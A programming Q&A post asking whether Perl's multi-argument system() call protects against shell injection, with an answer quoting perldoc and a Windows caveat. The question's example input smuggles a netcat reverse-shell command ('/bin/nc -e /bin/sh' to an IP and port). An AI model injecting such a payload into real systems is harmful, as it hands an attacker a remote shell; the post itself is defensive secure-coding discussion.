Avoiding code injection in system perl function

Question

system() is a function that executes a file with args 'n', meaning 'n' a real number.

If we have: system("path/to/program","firstArg","secondArg",...); the string inside the second argument will be always a string passed to "path/to/program" right?

If I do like: system("path/to/program","legitArg",$userinput); - does $userinput be vulnerable to code injection? Or it will be passed as string to path/to/program? Even if $userinput="some_kind_of_escape /bin/nc -e /bin/sh 10.0.0.1 1234" ?

If not how can I parametrise such arguments?

update:based on answer below I found this from stanford: using the perl system() function

Answer 1

That's (almost) correct usage to avoid shell injection, since Perl will use execvp to directly execute the given program, without passing the arguments through a command shell.

From perldoc system:

If there is more than one argument in LIST, or if LIST is an array with more than one value, starts the program given by the first element of the list with arguments given by the rest of the list. If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient. On Windows, only the "system PROGRAM LIST" syntax will reliably avoid using the shell; "system LIST", even with more than one element, will fall back to the shell if the first spawn fails.

Note the caveat about system LIST vs system PROGRAM LIST on Windows systems, so if your code is going to run there you should use:

system {"path/to/program"} "program-name", "legitArg", $userInput;

Nothing will protect you, of course, if the program that's being executed takes that user-supplied argument and passes it on to a shell itself.